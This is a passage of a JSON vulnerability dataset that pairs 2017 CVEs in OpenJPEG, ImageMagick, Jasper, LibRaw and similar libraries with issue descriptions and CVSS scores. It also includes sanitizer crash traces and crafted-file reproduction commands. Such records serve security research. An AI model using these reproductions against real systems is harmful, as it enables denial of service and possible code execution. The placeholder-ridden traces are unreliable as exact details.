NUMBERTAG f1fe7bec9d0 in APITAG splay APITAG NUMBERTAG f1fe NUMBERTAG d0fb4 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG bdc0 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG e2b in APITAG APITAG NUMBERTAG f1fe NUMBERTAG e8 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe6e NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG 
NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7bec9d0 in APITAG splay APITAG NUMBERTAG f1fe7bed NUMBERTAG c in APITAG splay APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG cb in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7bec9d0 in APITAG splay APITAG NUMBERTAG f1fe7b2c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c0d3 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe6e NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe7c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7b2c3f3 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c0d3 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe6e NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG 
byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe7c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7b2c3f3 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe6e NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe7c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7bed7e1 in APITAG splay APITAG NUMBERTAG f1fe7b NUMBERTAG fdc in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG cb in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe7c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7b2c3e3 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe6e NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in 
APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe7c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7b2c3e3 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c0d3 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe6e NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe7c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7bed7e1 in APITAG splay APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG cb in APITAG APITAG NUMBERTAG f1fe7ec4f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7ec NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG eb5d in APITAG APITAG NUMBERTAG f1fe NUMBERTAG f NUMBERTAG d in APITAG APITAG NUMBERTAG f1fe6f2d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG dee NUMBERTAG in __interceptor_malloc APITAG NUMBERTAG f1fe7a9ee NUMBERTAG in APITAG APITAG NUMBERTAG f1fe7a9eed8 in APITAG APITAG NUMBERTAG f1fe7c NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d0f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe 
NUMBERTAG bdc0 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG e2b in APITAG APITAG NUMBERTAG f1fe NUMBERTAG e8 in APITAG APITAG NUMBERTAG f1fe NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fe6e NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG f1fe NUMBERTAG c NUMBERTAG f in APITAG APITAG NUMBERTAG a7 in APITAG APITAG NUMBERTAG in main APITAG NUMBERTAG f1fe2d NUMBERTAG f NUMBERTAG in __libc_start_main libc APITAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). \u00b7\u00b7\u00b7 POC: URLTAG Credit : APITAG of Venustech",
  8641. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8642. "severity": "MEDIUM",
  8643. "baseScore": 6.5,
  8644. "impactScore": 3.6,
  8645. "exploitabilityScore": 2.8
  8646. },
  8647. {
  8648. "CVE_ID": "CVE-2017-14151",
  8649. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/982",
  8650. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/982",
  8651. "Repo_new": "uclouvain/openjpeg",
  8652. "Issue_Created_At": "2017-08-14T11:17:11Z",
  8653. "description": "heap base buffer overflow in opj_mqc_flush (mqc.c). On NUMBERTAG ERRORTAG Testcase: URLTAG",
  8654. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8655. "severity": "HIGH",
  8656. "baseScore": 8.8,
  8657. "impactScore": 5.9,
  8658. "exploitabilityScore": 2.8
  8659. },
  8660. {
  8661. "CVE_ID": "CVE-2017-14152",
  8662. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/985",
  8663. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/985",
  8664. "Repo_new": "uclouvain/openjpeg",
  8665. "Issue_Created_At": "2017-08-15T08:11:05Z",
  8666. "description": "heap based buffer overflow in opj_write_bytes_LE (cio.c). On NUMBERTAG ERRORTAG Testcase: URLTAG",
  8667. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8668. "severity": "HIGH",
  8669. "baseScore": 8.8,
  8670. "impactScore": 5.9,
  8671. "exploitabilityScore": 2.8
  8672. },
  8673. {
  8674. "CVE_ID": "CVE-2017-14164",
  8675. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/991",
  8676. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/991",
  8677. "Repo_new": "uclouvain/openjpeg",
  8678. "Issue_Created_At": "2017-08-16T14:30:54Z",
  8679. "description": "heap based buffer overflow in opj_write_bytes_LE (cio.c) (unfixed NUMBERTAG On master: ERRORTAG Testcase: URLTAG",
  8680. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8681. "severity": "HIGH",
  8682. "baseScore": 8.8,
  8683. "impactScore": 5.9,
  8684. "exploitabilityScore": 2.8
  8685. },
  8686. {
  8687. "CVE_ID": "CVE-2017-14172",
  8688. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/715",
  8689. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/715",
  8690. "Repo_new": "imagemagick/imagemagick",
  8691. "Issue_Created_At": "2017-08-31T14:37:10Z",
  8692. "description": "denial of service APITAG issue in APITAG in coders/ps.c. Hello all. We found a denial of service APITAG issue in Imagemagick NUMBERTAG Q NUMBERTAG which can cause huge CPU and memory consumption. Note that this issue is quite similar to issue NUMBERTAG we have reported. The vulnerable code is shown as below. ERRORTAG A crafted PS image file, which claims a large length but does not contain sufficient backing data, would cause a large loop at line NUMBERTAG since there is no EOF check inside. APITAG FILETAG The command we were using is APITAG In our tests we used a machine with Intel(R) Xeon(R) CPU E NUMBERTAG GHz NUMBERTAG CPU cores and NUMBERTAG GB RAM. This issue caused NUMBERTAG CPU and up to NUMBERTAG GB RAM consumption. This process lasted for about NUMBERTAG minutes. Note that this issue was found by Xiaohei and Wangchu from Alibaba Security Team. Thanks.",
  8693. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8694. "severity": "MEDIUM",
  8695. "baseScore": 6.5,
  8696. "impactScore": 3.6,
  8697. "exploitabilityScore": 2.8
  8698. },
  8699. {
  8700. "CVE_ID": "CVE-2017-14173",
  8701. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/713",
  8702. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/713",
  8703. "Repo_new": "imagemagick/imagemagick",
  8704. "Issue_Created_At": "2017-08-31T12:43:45Z",
  8705. "description": "An infinite loop issue in APITAG coders/txt.c. Hello all. We found an infinite loop issue in Imagemagick NUMBERTAG Q NUMBERTAG The vulnerable code is shown as below. APITAG An integer overflow might happen for the addition operation APITAG when a crafted TXT file, which claims a large max_value, is provided. APITAG FILETAG In our poc, we set max_value as NUMBERTAG L The command we were using is APITAG Note that this issue was found by Xiaohei and Wangchu from Alibaba Security Team. Thanks.",
  8706. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8707. "severity": "MEDIUM",
  8708. "baseScore": 6.5,
  8709. "impactScore": 3.6,
  8710. "exploitabilityScore": 2.8
  8711. },
  8712. {
  8713. "CVE_ID": "CVE-2017-14174",
  8714. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/714",
  8715. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/714",
  8716. "Repo_new": "imagemagick/imagemagick",
  8717. "Issue_Created_At": "2017-08-31T14:06:02Z",
  8718. "description": "denial of service APITAG issue in APITAG in coders/psd.c. Hello all. We found a denial of service APITAG issue in Imagemagick NUMBERTAG Q NUMBERTAG which can cause huge CPU consumption. Note that this issue is quite similar to issue NUMBERTAG we have reported. The vulnerable code is shown as below. ERRORTAG A crafted PSD image file, which claims a large length but does not contain sufficient backing data, would cause a large loop at line NUMBERTAG since there is no EOF check inside. APITAG FILETAG The command we were using is APITAG In our tests we used a machine with Intel(R) Xeon(R) CPU E NUMBERTAG GHz NUMBERTAG CPU cores and NUMBERTAG GB RAM. This issue caused NUMBERTAG CPU for more than NUMBERTAG and a half minutes. Note that this issue was found by Xiaohei and Wangchu from Alibaba Security Team. Thanks.",
  8719. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8720. "severity": "MEDIUM",
  8721. "baseScore": 6.5,
  8722. "impactScore": 3.6,
  8723. "exploitabilityScore": 2.8
  8724. },
  8725. {
  8726. "CVE_ID": "CVE-2017-14175",
  8727. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/712",
  8728. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/712",
  8729. "Repo_new": "imagemagick/imagemagick",
  8730. "Issue_Created_At": "2017-08-31T12:18:01Z",
  8731. "description": "denial of service APITAG issue in APITAG in coders/xbm.c. Hello all. We found a denial of service APITAG issue in Imagemagick NUMBERTAG Q NUMBERTAG which can cause huge CPU and memory consumption. These issues are quite similar to the bugs we have found in APITAG ( CVETAG , CVETAG and CVETAG ). The vulnerable code is shown as below. ERRORTAG A crafted XBM image file, which claims large image->rows and image->columns but does not contain sufficient backing data, would cause a large and heavy loop at line NUMBERTAG since there is no EOF check inside. APITAG FILETAG The command we were using is APITAG In our tests we used a machine with Intel(R) Xeon(R) CPU E NUMBERTAG GHz NUMBERTAG CPU cores and NUMBERTAG GB RAM. This issue caused NUMBERTAG CPU and up to NUMBERTAG GB memory consumption. Note that this process lasted for more than NUMBERTAG minutes. Note that this issue was found by Xiaohei and Wangchu from Alibaba Security Team.",
  8732. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8733. "severity": "MEDIUM",
  8734. "baseScore": 6.5,
  8735. "impactScore": 3.6,
  8736. "exploitabilityScore": 2.8
  8737. },
  8738. {
  8739. "CVE_ID": "CVE-2017-14181",
  8740. "Issue_Url_old": "https://github.com/teknoraver/aacplusenc/issues/1",
  8741. "Issue_Url_new": "https://github.com/teknoraver/aacplusenc/issues/1",
  8742. "Repo_new": "teknoraver/aacplusenc",
  8743. "Issue_Created_At": "2017-08-31T07:21:22Z",
  8744. "description": "NULL pointer dereference in APITAG (bitbuffer.c). On NUMBERTAG ERRORTAG Testcase: URLTAG",
  8745. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8746. "severity": "HIGH",
  8747. "baseScore": 7.8,
  8748. "impactScore": 5.9,
  8749. "exploitabilityScore": 1.8
  8750. },
  8751. {
  8752. "CVE_ID": "CVE-2017-14224",
  8753. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/733",
  8754. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/733",
  8755. "Repo_new": "imagemagick/imagemagick",
  8756. "Issue_Created_At": "2017-09-06T02:18:32Z",
  8757. "description": "Heap buffer overflow in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A heap buffer overflow vulnerability was found in function APITAG in APITAG, allowing attackers to cause a denial of service or remote code execution via a crafted file. ./magick convert NUMBERTAG im2pcx out.pcx CODETAG testcase: URLTAG Note that this issue was found by lifuhao from Aliyun Security Team. Thanks",
  8758. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8759. "severity": "HIGH",
  8760. "baseScore": 8.8,
  8761. "impactScore": 5.9,
  8762. "exploitabilityScore": 2.8
  8763. },
  8764. {
  8765. "CVE_ID": "CVE-2017-14229",
  8766. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/146",
  8767. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/146",
  8768. "Repo_new": "jasper-software/jasper",
  8769. "Issue_Created_At": "2017-08-31T08:39:34Z",
  8770. "description": "Infinite loop in jpc_dec.c of Jasper. version: Summary: There is an infinite loop in jpc_dec.c of Jasper. Description: The gdb debugging information is listed below: (gdb) set args POC NUMBERTAG (gdb) r The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: PATHTAG f PATHTAG FILETAG",
  8771. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  8772. "severity": "HIGH",
  8773. "baseScore": 7.5,
  8774. "impactScore": 3.6,
  8775. "exploitabilityScore": 3.9
  8776. },
  8777. {
  8778. "CVE_ID": "CVE-2017-14230",
  8779. "Issue_Url_old": "https://github.com/cyrusimap/cyrus-imapd/issues/2132",
  8780. "Issue_Url_new": "https://github.com/cyrusimap/cyrus-imapd/issues/2132",
  8781. "Repo_new": "cyrusimap/cyrus-imapd",
  8782. "Issue_Created_At": "2017-08-31T05:05:14Z",
  8783. "description": "Broken Other Users behaviour in NUMBERTAG Gabriele Bulfon < EMAILTAG > reported this issue on the mailing list: ERRORTAG",
  8784. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  8785. "severity": "CRITICAL",
  8786. "baseScore": 9.1,
  8787. "impactScore": 5.2,
  8788. "exploitabilityScore": 3.9
  8789. },
  8790. {
  8791. "CVE_ID": "CVE-2017-14231",
  8792. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/78",
  8793. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/78",
  8794. "Repo_new": "semplon/genixcms",
  8795. "Issue_Created_At": "2017-08-07T05:58:15Z",
  8796. "description": "Two logic bugs in latest product. Hello Developers, I have found two logic bugs in your product, which may cause some problems. I hope this helps you. The first point: at FILETAG line NUMBERTAG APITAG Here, you use the same password for testing. The second point: at FILETAG line NUMBERTAG APITAG , Let's follow up this function FILETAG line NUMBERTAG ERRORTAG Let's follow up Typo::strip FILETAG line NUMBERTAG ERRORTAG We can see that the regular expressions here strip the corner brackets; for example: if username is APITAG then the function will return admin . But finally, the data is not checked for an existing user of the same name before entering the database, so it will cause a large problem: we can block any member's account if we know his username. Why? Because in FILETAG line NUMBERTAG c NUMBERTAG there are two users called admin. That's what I want to say. If I don't make it clear, please contact me",
  8797. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  8798. "severity": "MEDIUM",
  8799. "baseScore": 5.3,
  8800. "impactScore": 1.4,
  8801. "exploitabilityScore": 3.9
  8802. },
  8803. {
  8804. "CVE_ID": "CVE-2017-14245",
  8805. "Issue_Url_old": "https://github.com/erikd/libsndfile/issues/317",
  8806. "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/317",
  8807. "Repo_new": "libsndfile/libsndfile",
  8808. "Issue_Created_At": "2017-09-12T02:47:14Z",
  8809. "description": "APITAG confusion in . function APITAG in ulaw.c and d2ulaw_array (const double ptr, int count, unsigned char buffer, double normfact) { while ( count NUMBERTAG if (ptr [count NUMBERTAG buffer [count] = ulaw_encode [lrint (normfact ptr [count])] ; else buffer [count NUMBERTAG F & ulaw_encode [ lrint (normfact ptr [count])] ; } ; } / d2ulaw_array /",
  8810. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  8811. "severity": "HIGH",
  8812. "baseScore": 8.1,
  8813. "impactScore": 5.2,
  8814. "exploitabilityScore": 2.8
  8815. },
  8816. {
  8817. "CVE_ID": "CVE-2017-14248",
  8818. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/717",
  8819. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/717",
  8820. "Repo_new": "imagemagick/imagemagick",
  8821. "Issue_Created_At": "2017-09-01T04:37:53Z",
  8822. "description": "A heap buffer overflow in function APITAG in resize.c. A bug was triggered when convert a file to pdf using APITAG , I use the command line \" ./magick convert pdf.poc FILETAG \" and the asan shows NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f6b7aafeb NUMBERTAG at pc NUMBERTAG d1d NUMBERTAG c bp NUMBERTAG ffc NUMBERTAG f NUMBERTAG sp NUMBERTAG ffc NUMBERTAG f NUMBERTAG READ of size NUMBERTAG at NUMBERTAG f6b7aafeb NUMBERTAG thread T NUMBERTAG d1d NUMBERTAG b in APITAG PATHTAG NUMBERTAG d NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG edef1 in APITAG PATHTAG NUMBERTAG a NUMBERTAG ff in APITAG PATHTAG NUMBERTAG a2a NUMBERTAG d in APITAG PATHTAG NUMBERTAG eb5a6a in APITAG PATHTAG NUMBERTAG fc NUMBERTAG da in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f6b7e NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG f NUMBERTAG in _start ( PATHTAG NUMBERTAG f6b7aafeb NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG e2c NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG b NUMBERTAG c in APITAG PATHTAG NUMBERTAG cc NUMBERTAG in APITAG PATHTAG NUMBERTAG d2a NUMBERTAG in APITAG PATHTAG NUMBERTAG d NUMBERTAG a4 in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG a NUMBERTAG f in APITAG PATHTAG NUMBERTAG a NUMBERTAG e in APITAG PATHTAG NUMBERTAG ea NUMBERTAG in APITAG PATHTAG NUMBERTAG fc NUMBERTAG da in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f6b7e NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG fedef NUMBERTAG d NUMBERTAG fedef NUMBERTAG d NUMBERTAG fedef NUMBERTAG d NUMBERTAG fedef NUMBERTAG d NUMBERTAG fedef NUMBERTAG d NUMBERTAG fedef NUMBERTAG d NUMBERTAG fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fedef NUMBERTAG d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa 
fa fa fa fa fa NUMBERTAG fedef NUMBERTAG d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fedef NUMBERTAG d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fedef NUMBERTAG da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fedef NUMBERTAG db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING The poc was at: URLTAG Note that this issue was found by lifuhao from Aliyun Security Team.",
  8823. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8824. "severity": "MEDIUM",
  8825. "baseScore": 6.5,
  8826. "impactScore": 3.6,
  8827. "exploitabilityScore": 2.8
  8828. },
  8829. {
  8830. "CVE_ID": "CVE-2017-14249",
  8831. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/708",
  8832. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/708",
  8833. "Repo_new": "imagemagick/imagemagick",
  8834. "Issue_Created_At": "2017-08-31T03:50:27Z",
  8835. "description": "\"FPE on unknown address\" error when converting to pdf . Hello , this is the first time I post a bug. I use AFL with Asan to test APITAG and find a crash in APITAG when converting file to pdf. My command line: ./magick convert poc out.pcd The Asan shows: ASAN:DEADLYSIGNAL APITAG NUMBERTAG ERROR: APITAG FPE on unknown address NUMBERTAG pc NUMBERTAG c8ae1 bp NUMBERTAG c4a NUMBERTAG a NUMBERTAG sp NUMBERTAG ffcdaf8f NUMBERTAG T NUMBERTAG c8ae0 in APITAG PATHTAG NUMBERTAG d NUMBERTAG aea in APITAG PATHTAG NUMBERTAG ac5ed2 in APITAG PATHTAG NUMBERTAG c NUMBERTAG in APITAG PATHTAG NUMBERTAG a NUMBERTAG ff in APITAG PATHTAG NUMBERTAG a2a NUMBERTAG d in APITAG PATHTAG NUMBERTAG eb5a6a in APITAG PATHTAG NUMBERTAG fc NUMBERTAG da in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ad NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG f NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG FPE PATHTAG in APITAG NUMBERTAG ABORTING And the poc: URLTAG Thank you",
  8836. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8837. "severity": "MEDIUM",
  8838. "baseScore": 6.5,
  8839. "impactScore": 3.6,
  8840. "exploitabilityScore": 2.8
  8841. },
  8842. {
  8843. "CVE_ID": "CVE-2017-14257",
  8844. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/181",
  8845. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/181",
  8846. "Repo_new": "axiomatic-systems/bento4",
  8847. "Issue_Created_At": "2017-09-08T10:29:00Z",
  8848. "description": "Multiple Exploitable and Non Exploitable issues Identified. Exploitable Write Access Violation: APITAG APITAG FILETAG",
  8849. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  8850. "severity": "HIGH",
  8851. "baseScore": 7.8,
  8852. "impactScore": 5.9,
  8853. "exploitabilityScore": 1.8
  8854. },
  8855. {
  8856. "CVE_ID": "CVE-2017-14265",
  8857. "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/99",
  8858. "Issue_Url_new": "https://github.com/libraw/libraw/issues/99",
  8859. "Repo_new": "libraw/libraw",
  8860. "Issue_Created_At": "2017-09-08T09:02:39Z",
  8861. "description": "A Stack Buffer Overflow was discovered in APITAG A Stack Buffer Overflow was discovered in APITAG APITAG It could allow remote denial of service and code execution attacks. Command to reproduce: APITAG The latest version is vulnerable; other versions may also be affected. The sanitizer output: ERRORTAG In APITAG , color was defined as: APITAG With the input testcase in gdb, we could see that h is NUMBERTAG which leads to a stack overflow CODETAG",
  8862. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  8863. "severity": "CRITICAL",
  8864. "baseScore": 9.8,
  8865. "impactScore": 5.9,
